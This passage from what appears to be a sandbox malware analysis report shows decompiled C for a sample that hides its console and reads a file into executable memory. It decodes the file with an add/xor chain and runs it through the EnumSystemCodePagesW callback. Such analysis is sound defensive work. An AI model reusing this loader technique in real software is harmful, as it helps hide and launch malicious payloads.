10856->10859 10857->10842 10860 4116cb 10858->10860 10859->10842 10861 40f93c pre_c_initialization 25 API calls 10860->10861 10861->10859 10863 4115bd ___scrt_uninitialize_crt LeaveCriticalSection 10862->10863 10864 413f4c 10863->10864 10864->10759 10865->10735 10866->10721

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 145 b80227-b80338 call b80005 call b800e4 * 8 164 b8033b-b8037b 145->164 165 b80384-b80388 164->165 166 b8038a-b803ac 165->166 167 b803ae-b803c6 165->167 166->165 169 b803c8-b803e0 167->169 170 b8042e-b80435 167->170 169->170 171 b803e2-b803f8 169->171 170->164 171->170 172 b803fa-b80412 171->172 172->170 173 b80414-b8042c 172->173 173->170 174 b8043a-b8044b 173->174 176 b8044d 174->176 177 b80452-b80462 174->177 178 b8091c-b8091d 176->178 180 b80469-b8048c CreateFileW 177->180 181 b80464 177->181 182 b8048e 180->182 183 b80493-b804c4 VirtualAlloc ReadFile 180->183 181->178 182->178 185 b804cb-b804de 183->185 186 b804c6 183->186 188 b80902 185->188 189 b804e4-b808fd 185->189 186->178 190 b80906-b80915 call b8091e 188->190 193 b80917-b80919 ExitProcess 190->193
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00B80482
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.311017537.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b80000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: -$;$A$r$s
                                                  • API String ID: 823142352-4219510768
                                                  • Opcode ID: 428cdf327bb76c5bf72ad432bf22704b14a04167fdbc86dd9b1d21022162ed40
                                                  • Instruction ID: d83e283039846e34fc19302433a14143dc048b672769fdd49356e1cc2e5e5486
                                                  • Opcode Fuzzy Hash: 428cdf327bb76c5bf72ad432bf22704b14a04167fdbc86dd9b1d21022162ed40
                                                  • Instruction Fuzzy Hash: 2232A820D5D2D8ADDF06DBE984517FDBFB09F26202F1840DAE5E1E6283C136874ADB21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 562 40ab9e-40aba9 SetUnhandledExceptionFilter
                                                  C-Code - Quality: 100%
                                                  			E0040AB9E() {
                                                  				_Unknown_base(*)()* _t1;
                                                  
                                                  				_t1 = SetUnhandledExceptionFilter(E0040ABAA); // executed
                                                  				return _t1;
                                                  			}




                                                  0x0040aba3
                                                  0x0040aba9

                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNELBASE(Function_0000ABAA,0040A51E), ref: 0040ABA3
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 8242c043f70ff0fce9602e40a3c009c5e4c33ac9d99312ea9adff4681cf96eb8
                                                  • Instruction ID: 0e5e69ea80962e3745035f55731dfb63affe3dee562107f3db3c1ad63ce48973
                                                  • Opcode Fuzzy Hash: 8242c043f70ff0fce9602e40a3c009c5e4c33ac9d99312ea9adff4681cf96eb8
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  C-Code - Quality: 88%
                                                  			E00409720(struct HWND__* __eax, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                  				signed int _v8;
                                                  				void* _v12;
                                                  				signed short* _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				intOrPtr* _v28;
                                                  				int _v32;
                                                  				signed int _v36;
                                                  				char* _v40;
                                                  				char* _v44;
                                                  				signed int _v48;
                                                  				char* _v52;
                                                  				signed int _v56;
                                                  				char* _v60;
                                                  				signed int _v64;
                                                  				signed int _v68;
                                                  				char* _v72;
                                                  				signed int _v76;
                                                  				char* _v80;
                                                  				short _v82;
                                                  				short _v84;
                                                  				short _v86;
                                                  				short _v88;
                                                  				short _v90;
                                                  				short _v92;
                                                  				short _v94;
                                                  				short _v96;
                                                  				short _v98;
                                                  				short _v100;
                                                  				short _v102;
                                                  				short _v104;
                                                  				short _v106;
                                                  				long _v112;
                                                  				signed int _v116;
                                                  				void* _v120;
                                                  				int _v124;
                                                  				int _v128;
                                                  				int _v132;
                                                  				int _v136;
                                                  				int _v140;
                                                  				int _v144;
                                                  				int _v148;
                                                  				int _v152;
                                                  				signed int _v156;
                                                  				signed int _v160;
                                                  				signed int _v164;
                                                  				signed int _v168;
                                                  				signed int _v172;
                                                  				signed int _v176;
                                                  				signed int _v180;
                                                  				signed int _v184;
                                                  				int _v188;
                                                  				long _v192;
                                                  				struct _STARTUPINFOW _v260;
                                                  				int _t347;
                                                  				void* _t351;
                                                  				void* _t353;
                                                  				signed int _t402;
                                                  				signed int _t404;
                                                  				signed int _t418;
                                                  				short _t423;
                                                  				signed int _t428;
                                                  				signed int _t429;
                                                  				short _t433;
                                                  				signed int _t436;
                                                  				signed int _t437;
                                                  				signed int _t441;
                                                  				signed int _t444;
                                                  				int _t449;
                                                  				short _t452;
                                                  				signed int _t456;
                                                  				signed int _t463;
                                                  				short _t468;
                                                  				intOrPtr _t518;
                                                  				signed int _t528;
                                                  				signed int _t529;
                                                  				short _t531;
                                                  				signed int _t534;
                                                  				signed int _t535;
                                                  				short _t539;
                                                  				short _t543;
                                                  				short _t554;
                                                  				intOrPtr _t600;
                                                  				signed int _t603;
                                                  				struct HWND__* _t609;
                                                  				signed int _t611;
                                                  				signed int _t612;
                                                  				short _t614;
                                                  				short _t619;
                                                  				signed int _t622;
                                                  				signed int _t623;
                                                  				short _t636;
                                                  				short _t642;
                                                  				signed int _t644;
                                                  				void* _t646;
                                                  				void* _t647;
                                                  				void* _t648;
                                                  				void* _t649;
                                                  				void* _t650;
                                                  
                                                  				_t645 = __edi;
                                                  				_v116 = 0;
                                                  				_v24 = 0;
                                                  				_v20 = 0;
                                                  				_v152 = 0;
                                                  				_v188 = 0;
                                                  				_v8 = 0;
                                                  				_v32 = 0;
                                                  				__imp__GetConsoleWindow(); // executed
                                                  				ShowWindow(__eax, 0); // executed
                                                  				_push(0x3d0900); // executed
                                                  				_t347 = E0040DC06(); // executed
                                                  				_t647 = _t646 + 4;
                                                  				_v32 = _t347;
                                                  				if(_v32 != 0) {
                                                  					E0040D210(__edi, _v32, 0x54, 0x3d0900);
                                                  					_t648 = _t647 + 0xc;
                                                  					__eflags = 4;
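                                                   					_t351 = CreateFileW( *(_a8 + (4 << 0)), 0x80000000, 1, 0, 3, 0x80, 0); // executed; opens the file named by _a8[1] with GENERIC_READ (0x80000000), FILE_SHARE_READ (1), OPEN_EXISTING (3)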
                                                  					_v120 = _t351;
                                                  					_v112 = GetFileSize(_v120, 0);
                                                   					_t353 = VirtualAlloc(0, _v112, 0x3000, 0x40); // executed; 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
                                                  					_v12 = _t353;
                                                  					ReadFile(_v120, _v12, _v112,  &_v192, 0); // executed
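                                                   					while(1) { // decodes the buffer in place: a fixed chain of add/sub/xor steps on each byte (_v8 = byte index, _v112 = file size)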
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x000000a5;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 0x68;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) + 0x6f;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 0x28;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 0xc6;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) + 0xf5;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 0xf8;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x0000002e;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) + 0x56;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x0000006d;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 0x50;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x00000097;
                                                  						_v8 = _v8 + 1;
                                                  						__eflags = _v8 - _v112;
                                                  						if(_v8 >= _v112) {
                                                  							break;
                                                  						}
                                                  					}
                                                   					EnumSystemCodePagesW(_v12, 0); // executed; the decoded buffer _v12 is passed as the enumeration callback, so the API calls into it
                                                  					E0040DBEB(_v32);
                                                  					_t649 = _t648 + 4;
                                                  					_v8 = 0;
                                                  					while(1) {
                                                  						__eflags = _v8 - _a4;
                                                  						if(_v8 >= _a4) {
                                                  							break;
                                                  						}
                                                  						 *0x41feac = 0x1f7;
                                                  						_t644 = _v8 + 1;
                                                  						__eflags = _t644;
                                                  						_v8 = _t644;
                                                  					}
                                                  					 *0x41ff4c = GetOEMCP();
                                                  					_t518 =  *0x41ff4c; // 0x0
                                                  					 *0x41ff48 = _t518;
                                                  					 *0x41ff38 = 0x32;
                                                  					_push(4);
                                                  					_t600 =  *0x41ff38; // 0x0
                                                  					_push(_t600);
                                                  					_t402 = E0040DBE0();
                                                  					_t650 = _t649 + 8;
                                                  					 *0x41ff34 = _t402;
                                                  					__eflags =  *0x41ff34;
                                                  					if( *0x41ff34 != 0) {
                                                  						_v8 = 1;
                                                  						while(1) {
                                                  							L13:
                                                  							__eflags = _v8 - _a4;
                                                  							if(_v8 >= _a4) {
                                                  								break;
                                                  							}
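                                                   							_v44 = L"--headless"; // inlined wide-string compare of _a8[_v8] against this option; the same pattern repeats below for --unix, --width, --height, --signal and --server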
                                                  							_v36 =  *((intOrPtr*)(_a8 + _v8 * 4));
                                                  							while(1) {
                                                  								_t611 = _v36;
                                                  								_t423 =  *_t611;
                                                  								_v100 = _t423;
                                                  								__eflags = _t423 -  *_v44;
                                                  								if(_t423 !=  *_v44) {
                                                  									break;
                                                  								}
                                                  								__eflags = _v100;
                                                  								if(_v100 == 0) {
                                                  									L19:
                                                  									_v124 = 0;
                                                  									L21:
                                                  									_v156 = _v124;
                                                  									__eflags = _v156;
                                                  									if(_v156 != 0) {
                                                  										_v52 = L"--unix";
                                                  										_v48 =  *((intOrPtr*)(_a8 + _v8 * 4));
                                                  										while(1) {
                                                  											_t528 = _v48;
                                                  											_t614 =  *_t528;
                                                  											_v104 = _t614;
                                                  											__eflags = _t614 -  *_v52;
                                                  											if(_t614 !=  *_v52) {
                                                  												break;
                                                  											}
                                                  											__eflags = _v104;
                                                  											if(_v104 == 0) {
                                                  												L28:
                                                  												_v128 = 0;
                                                  												L30:
                                                  												_v160 = _v128;
                                                  												__eflags = _v160;
                                                  												if(_v160 != 0) {
                                                  													_v60 = L"--width";
                                                  													_v56 =  *((intOrPtr*)(_a8 + _v8 * 4));
                                                  													while(1) {
                                                  														_t428 = _v56;
                                                  														_t531 =  *_t428;
                                                  														_v82 = _t531;
                                                  														__eflags = _t531 -  *_v60;
                                                  														if(_t531 !=  *_v60) {
                                                  															break;
                                                  														}
                                                  														__eflags = _v82;
                                                  														if(_v82 == 0) {
                                                  															L37:
                                                  															_v132 = 0;
                                                  															L39:
                                                  															_v164 = _v132;
                                                  															__eflags = _v164;
                                                  															if(_v164 != 0) {
                                                  																_v40 = L"--height";
                                                  																_v64 =  *((intOrPtr*)(_a8 + _v8 * 4));
                                                  																while(1) {
                                                  																	_t534 = _v64;
                                                  																	_t619 =  *_t534;
                                                  																	_v98 = _t619;
                                                  																	__eflags = _t619 -  *_v40;
                                                  																	if(_t619 !=  *_v40) {
                                                  																		break;
                                                  																	}
                                                  																	__eflags = _v98;
                                                  																	if(_v98 == 0) {
                                                  																		L53:
                                                  																		_v136 = 0;
                                                  																		L55:
                                                  																		_v168 = _v136;
                                                  																		__eflags = _v168;
                                                  																		if(_v168 != 0) {
                                                  																			_v72 = L"--signal";
                                                  																			_v68 =  *((intOrPtr*)(_a8 + _v8 * 4));
                                                  																			while(1) {
                                                  																				_t622 = _v68;
                                                  																				_t433 =  *_t622;
                                                  																				_v88 = _t433;
                                                  																				__eflags = _t433 -  *_v72;
                                                  																				if(_t433 !=  *_v72) {
                                                  																					break;
                                                  																				}
                                                  																				__eflags = _v88;
                                                  																				if(_v88 == 0) {
                                                  																					L69:
                                                  																					_v140 = 0;
                                                  																					L71:
                                                  																					_v172 = _v140;
                                                  																					__eflags = _v172;
                                                  																					if(_v172 != 0) {
                                                  																						_v80 = L"--server";
                                                  																						_v76 =  *((intOrPtr*)(_a8 + _v8 * 4));
                                                  																						while(1) {
                                                  																							_t436 = _v76;
                                                  																							_t539 =  *_t436;
                                                  																							_v92 = _t539;
                                                  																							__eflags = _t539 -  *_v80;
                                                  																							if(_t539 !=  *_v80) {
                                                  																								break;
                                                  																							}
                                                  																							__eflags = _v92;
                                                  																							if(_v92 == 0) {
                                                  																								L82:
                                                  																								_v144 = 0;
                                                  																								L84:
                                                  																								_v176 = _v144;
                                                  																								__eflags = _v176;
                                                  																								if(_v176 != 0) {
                                                  																									return 1;
                                                  																								}
                                                  																								_v8 = _v8 + 1;
                                                  																								__eflags = _v8 - _a4;
                                                  																								if(_v8 != _a4) {
                                                  																									_t441 = E0040E35E( *((intOrPtr*)(_a8 + _v8 * 4)),  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
                                                  																									_t650 = _t650 + 0xc;
                                                  																									 *0x41fea8 = _t441;
                                                  																									__eflags =  *_v16 & 0x0000ffff;
                                                  																									if(( *_v16 & 0x0000ffff) == 0) {
                                                  																										L12:
                                                  																										_t444 = _v8 + 1;
                                                  																										__eflags = _t444;
                                                  																										_v8 = _t444;
                                                  																										goto L13;
                                                  																									}
                                                  																									return 1;
                                                  																								}
                                                  																								return 1;
                                                  																							}
                                                  																							_t436 = _v76;
                                                  																							_t543 =  *((intOrPtr*)(_t436 + 2));
                                                  																							_v94 = _t543;
                                                  																							_t296 =  &(_v80[2]); // 0x73002d
                                                  																							__eflags = _t543 -  *_t296;
                                                  																							if(_t543 !=  *_t296) {
                                                  																								break;
                                                  																							}
                                                  																							_v76 = _v76 + 4;
                                                  																							_v80 =  &(_v80[4]);
                                                  																							__eflags = _v94;
                                                  																							if(_v94 != 0) {
                                                  																								continue;
                                                  																							}
                                                  																							goto L82;
                                                  																						}
                                                  																						asm("sbb eax, eax");
                                                  																						_t437 = _t436 | 0x00000001;
                                                  																						__eflags = _t437;
                                                  																						_v144 = _t437;
                                                  																						goto L84;
                                                  																					}
                                                  																					_v8 = _v8 + 1;
                                                  																					__eflags = _v8 - _a4;
                                                  																					if(_v8 != _a4) {
                                                  																						_t449 = E0040E35E(_v8,  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
                                                  																						_t650 = _t650 + 0xc;
                                                  																						_v152 = _t449;
                                                  																						__eflags =  *_v16 & 0x0000ffff;
                                                  																						if(( *_v16 & 0x0000ffff) == 0) {
                                                  																							goto L12;
                                                  																						}
                                                  																						return 1;
                                                  																					}
                                                  																					return 1;
                                                  																				}
                                                  																				_t622 = _v68;
                                                  																				_t452 =  *((intOrPtr*)(_t622 + 2));
                                                  																				_v90 = _t452;
                                                  																				_t260 =  &(_v72[2]); // 0x73002d
                                                  																				__eflags = _t452 -  *_t260;
                                                  																				if(_t452 !=  *_t260) {
                                                  																					break;
                                                  																				}
                                                  																				_v68 = _v68 + 4;
                                                  																				_v72 =  &(_v72[4]);
                                                  																				__eflags = _v90;
                                                  																				if(_v90 != 0) {
                                                  																					continue;
                                                  																				}
                                                  																				goto L69;
                                                  																			}
                                                  																			asm("sbb edx, edx");
                                                  																			_t623 = _t622 | 0x00000001;
                                                  																			__eflags = _t623;
                                                  																			_v140 = _t623;
                                                  																			goto L71;
                                                  																		}
                                                  																		_v8 = _v8 + 1;
                                                  																		__eflags = _v8 - _a4;
                                                  																		if(_v8 != _a4) {
                                                  																			_t456 = E0040E35E(_a8,  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
                                                  																			_t650 = _t650 + 0xc;
                                                  																			_v20 = _t456;
                                                  																			__eflags = _v20;
                                                  																			if(_v20 != 0) {
                                                  																				L60:
                                                  																				__eflags = _v20 - 0xffff;
                                                  																				if(_v20 > 0xffff) {
                                                  																					L62:
                                                  																					return 1;
                                                  																				}
                                                  																				__eflags =  *_v16 & 0x0000ffff;
                                                  																				if(( *_v16 & 0x0000ffff) == 0) {
                                                  																					goto L12;
                                                  																				}
                                                  																				goto L62;
                                                  																			}
                                                  																			__eflags =  *0x41feb4;
                                                  																			if( *0x41feb4 == 0) {
                                                  																				goto L62;
                                                  																			}
                                                  																			goto L60;
                                                  																		}
                                                  																		return 1;
                                                  																	}
                                                  																	_t534 = _v64;
                                                  																	_t636 =  *((intOrPtr*)(_t534 + 2));
                                                  																	_v86 = _t636;
                                                  																	_t222 =  &(_v40[2]); // 0x68002d
                                                  																	__eflags = _t636 -  *_t222;
                                                  																	if(_t636 !=  *_t222) {
                                                  																		break;
                                                  																	}
                                                  																	_v64 = _v64 + 4;
                                                  																	_v40 =  &(_v40[4]);
                                                  																	__eflags = _v86;
                                                  																	if(_v86 != 0) {
                                                  																		continue;
                                                  																	}
                                                  																	goto L53;
                                                  																}
                                                  																asm("sbb ecx, ecx");
                                                  																_t535 = _t534 | 0x00000001;
                                                  																__eflags = _t535;
                                                  																_v136 = _t535;
                                                  																goto L55;
                                                  															}
                                                  															_v8 = _v8 + 1;
                                                  															__eflags = _v8 - _a4;
                                                  															if(_v8 != _a4) {
                                                  																_t463 = E0040E35E( *((intOrPtr*)(_a8 + _v8 * 4)),  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
                                                  																_t650 = _t650 + 0xc;
                                                  																_v24 = _t463;
                                                  																__eflags = _v24;
                                                  																if(_v24 != 0) {
                                                  																	L44:
                                                  																	__eflags = _v24 - 0xffff;
                                                  																	if(_v24 > 0xffff) {
                                                  																		L46:
                                                  																		return 1;
                                                  																	}
                                                  																	__eflags =  *_v16 & 0x0000ffff;
                                                  																	if(( *_v16 & 0x0000ffff) == 0) {
                                                  																		goto L12;
                                                  																	}
                                                  																	goto L46;
                                                  																}
                                                  																__eflags =  *0x41feb4;
                                                  																if( *0x41feb4 == 0) {
                                                  																	goto L46;
                                                  																}
                                                  																goto L44;
                                                  															}
                                                  															return 1;
                                                  														}
                                                  														_t428 = _v56;
                                                  														_t554 =  *((intOrPtr*)(_t428 + 2));
                                                  														_v84 = _t554;
                                                  														_t184 =  &(_v60[2]); // 0x77002d
                                                  														__eflags = _t554 -  *_t184;
                                                  														if(_t554 !=  *_t184) {
                                                  															break;
                                                  														}
                                                  														_v56 = _v56 + 4;
                                                  														_v60 =  &(_v60[4]);
                                                  														__eflags = _v84;
                                                  														if(_v84 != 0) {
                                                  															continue;
                                                  														}
                                                  														goto L37;
                                                  													}
                                                  													asm("sbb eax, eax");
                                                  													_t429 = _t428 | 0x00000001;
                                                  													__eflags = _t429;
                                                  													_v132 = _t429;
                                                  													goto L39;
                                                  												}
                                                  												 *0x41feb4 = 1;
                                                  												 *0x41feb8 = 1;
                                                  												_v116 = 1;
                                                  												goto L12;
                                                  											}
                                                  											_t528 = _v48;
                                                  											_t642 =  *((intOrPtr*)(_t528 + 2));
                                                  											_v106 = _t642;
                                                  											_t158 =  &(_v52[2]); // 0x75002d
                                                  											__eflags = _t642 -  *_t158;
                                                  											if(_t642 !=  *_t158) {
                                                  												break;
                                                  											}
                                                  											_v48 = _v48 + 4;
                                                  											_v52 =  &(_v52[4]);
                                                  											__eflags = _v106;
                                                  											if(_v106 != 0) {
                                                  												continue;
                                                  											}
                                                  											goto L28;
                                                  										}
                                                  										asm("sbb ecx, ecx");
                                                  										_t529 = _t528 | 0x00000001;
                                                  										__eflags = _t529;
                                                  										_v128 = _t529;
                                                  										goto L30;
                                                  									}
                                                  									_v116 = 1;
                                                  									goto L12;
                                                  								}
                                                  								_t611 = _v36;
                                                  								_t468 =  *((intOrPtr*)(_t611 + 2));
                                                  								_v102 = _t468;
                                                  								_t132 =  &(_v44[2]); // 0x68002d
                                                  								__eflags = _t468 -  *_t132;
                                                  								if(_t468 !=  *_t132) {
                                                  									break;
                                                  								}
                                                  								_v36 = _v36 + 4;
                                                  								_v44 =  &(_v44[4]);
                                                  								__eflags = _v102;
                                                  								if(_v102 != 0) {
                                                  									continue;
                                                  								}
                                                  								goto L19;
                                                  							}
                                                  							asm("sbb edx, edx");
                                                  							_t612 = _t611 | 0x00000001;
                                                  							__eflags = _t612;
                                                  							_v124 = _t612;
                                                  							goto L21;
                                                  						}
                                                  						__eflags =  *0x41fea8;
                                                  						if( *0x41fea8 != 0) {
                                                  							__eflags = _v24;
                                                  							if(_v24 == 0) {
                                                  								_v24 = 0x50;
                                                  							}
                                                  							__eflags = _v20;
                                                  							if(__eflags == 0) {
                                                  								_v20 = 0x96;
                                                  							}
                                                  							_t520 = _v20;
                                                  							 *0x41feb0 = E00402960(_v20, __eflags, 0x41fea8, 1, _v24, _v20);
                                                  							__eflags =  *0x41feb0;
                                                  							if( *0x41feb0 != 0) {
                                                  								__eflags = _v116;
                                                  								if(_v116 == 0) {
                                                  									_t404 = E004046F0(_t645, 0x41fea8);
                                                  									__eflags = _t404;
                                                  									if(_t404 != 0) {
                                                  										GetStartupInfoW( &_v260);
                                                  										_v28 = _v260.lpTitle;
                                                  										_t603 = _v28 + 2;
                                                  										__eflags = _t603;
                                                  										_v180 = _t603;
                                                  										do {
                                                  											_v96 =  *_v28;
                                                  											_v28 = _v28 + 2;
                                                  											__eflags = _v96;
                                                  										} while (_v96 != 0);
                                                  										_v184 = _v28 - _v180 >> 1;
                                                  										E00406640(0x41fea8, _v260.lpTitle, _v184 << 1);
                                                  										__eflags = _v260.dwFlags & 0x00000001;
                                                  										if((_v260.dwFlags & 0x00000001) == 0) {
                                                  											_v148 = 5;
                                                  										} else {
                                                  											_v148 = _v260.wShowWindow & 0x0000ffff;
                                                  										}
                                                  										_t609 =  *0x41ff50; // 0x0
                                                  										ShowWindow(_t609, _v148);
                                                  										L116:
                                                  										return E00404CA0(0x41fea8, _v152);
                                                  									}
                                                  									return 1;
                                                  								}
                                                  								 *0x41ff58 = GetStdHandle(0xfffffff6);
                                                  								 *0x41ff5c = GetStdHandle(0xfffffff5);
                                                  								__eflags =  *0x41ff58;
                                                  								if( *0x41ff58 != 0) {
                                                  									L102:
                                                  									E00404690(0x41fea8);
                                                  									__eflags =  *0x41feb4;
                                                  									if( *0x41feb4 != 0) {
                                                  										L105:
                                                  										L107:
                                                  										goto L116;
                                                  									}
                                                  									_t418 = E004034E0(_t520, 0x41fea8);
                                                  									__eflags = _t418;
                                                  									if(_t418 != 0) {
                                                  										goto L105;
                                                  									}
                                                  									return 1;
                                                  								}
                                                  								__eflags =  *0x41ff5c;
                                                  								if( *0x41ff5c == 0) {
                                                  									 *0x41febc = 1;
                                                  									goto L107;
                                                  								}
                                                  								goto L102;
                                                  							} else {
                                                  								return 1;
                                                  							}
                                                  						}
                                                  						return 1;
                                                  					}
                                                  					return 1;
                                                  				}
                                                  				return 0;
                                                  			}

                                                  0x00409c22
                                                  0x00000000
                                                  0x00409bf0
                                                  0x00409b99
                                                  0x00409b9c
                                                  0x00409ba0
                                                  0x00409ba7
                                                  0x00409ba7
                                                  0x00409bab
                                                  0x00000000
                                                  0x00000000
                                                  0x00409bad
                                                  0x00409bb1
                                                  0x00409bb5
                                                  0x00409bba
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409bba
                                                  0x00409bc5
                                                  0x00409bc7
                                                  0x00409bc7
                                                  0x00409bca
                                                  0x00000000
                                                  0x00409bca
                                                  0x00409b4d
                                                  0x00409b57
                                                  0x00409b61
                                                  0x00000000
                                                  0x00409b61
                                                  0x00409b07
                                                  0x00409b0a
                                                  0x00409b0e
                                                  0x00409b15
                                                  0x00409b15
                                                  0x00409b19
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b1b
                                                  0x00409b1f
                                                  0x00409b23
                                                  0x00409b28
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b28
                                                  0x00409b33
                                                  0x00409b35
                                                  0x00409b35
                                                  0x00409b38
                                                  0x00000000
                                                  0x00409b38
                                                  0x00409acf
                                                  0x00000000
                                                  0x00409acf
                                                  0x00409a89
                                                  0x00409a8c
                                                  0x00409a90
                                                  0x00409a97
                                                  0x00409a97
                                                  0x00409a9b
                                                  0x00000000
                                                  0x00000000
                                                  0x00409a9d
                                                  0x00409aa1
                                                  0x00409aa5
                                                  0x00409aaa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409aaa
                                                  0x00409ab5
                                                  0x00409ab7
                                                  0x00409ab7
                                                  0x00409aba
                                                  0x00000000
                                                  0x00409aba
                                                  0x00409ed0
                                                  0x00409ed7
                                                  0x00409ee3
                                                  0x00409ee7
                                                  0x00409ee9
                                                  0x00409ee9
                                                  0x00409ef0
                                                  0x00409ef4
                                                  0x00409ef6
                                                  0x00409ef6
                                                  0x00409efd
                                                  0x00409f11
                                                  0x00409f16
                                                  0x00409f1d
                                                  0x00409f29
                                                  0x00409f2d
                                                  0x00409f9c
                                                  0x00409fa1
                                                  0x00409fa3
                                                  0x00409fb6
                                                  0x00409fc2
                                                  0x00409fc8
                                                  0x00409fc8
                                                  0x00409fcb
                                                  0x00409fd1
                                                  0x00409fd7
                                                  0x00409fdb
                                                  0x00409fdf
                                                  0x00409fdf
                                                  0x00409ff1
                                                  0x0040a00c
                                                  0x0040a017
                                                  0x0040a01a
                                                  0x0040a02b
                                                  0x0040a01c
                                                  0x0040a023
                                                  0x0040a023
                                                  0x0040a03c
                                                  0x0040a043
                                                  0x0040a049
                                                  0x00000000
                                                  0x0040a055
                                                  0x00000000
                                                  0x00409fa5
                                                  0x00409f37
                                                  0x00409f44
                                                  0x00409f49
                                                  0x00409f50
                                                  0x00409f5b
                                                  0x00409f60
                                                  0x00409f65
                                                  0x00409f6c
                                                  0x00409f86
                                                  0x00409f92
                                                  0x00000000
                                                  0x00409f92
                                                  0x00409f73
                                                  0x00409f78
                                                  0x00409f7a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409f7c
                                                  0x00409f52
                                                  0x00409f59
                                                  0x00409f88
                                                  0x00000000
                                                  0x00409f88
                                                  0x00000000
                                                  0x00409f1f
                                                  0x00000000
                                                  0x00409f1f
                                                  0x00409f1d
                                                  0x00000000
                                                  0x00409ed9
                                                  0x00000000
                                                  0x00409a35
                                                  0x00000000

                                                  APIs
                                                  • GetConsoleWindow.KERNELBASE(00000000), ref: 00409762
                                                  • ShowWindow.USER32(00000000), ref: 00409769
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004097C0
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 004097CF
                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 004097E5
                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00409803
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: File$Window$AllocConsoleCreateReadShowSizeVirtual
                                                  • String ID: P
                                                  • API String ID: 3075330158-3110715001
                                                  • Opcode ID: 9350dc32ad85247776eb7766d296cb9668ab8607546fc5f0d0b9a7cb4b47a0c2
                                                  • Instruction ID: 31952e796c7ddf8e068097985c5af672fbe9e1e17c7b6cd70b4dec0f663d8c1b
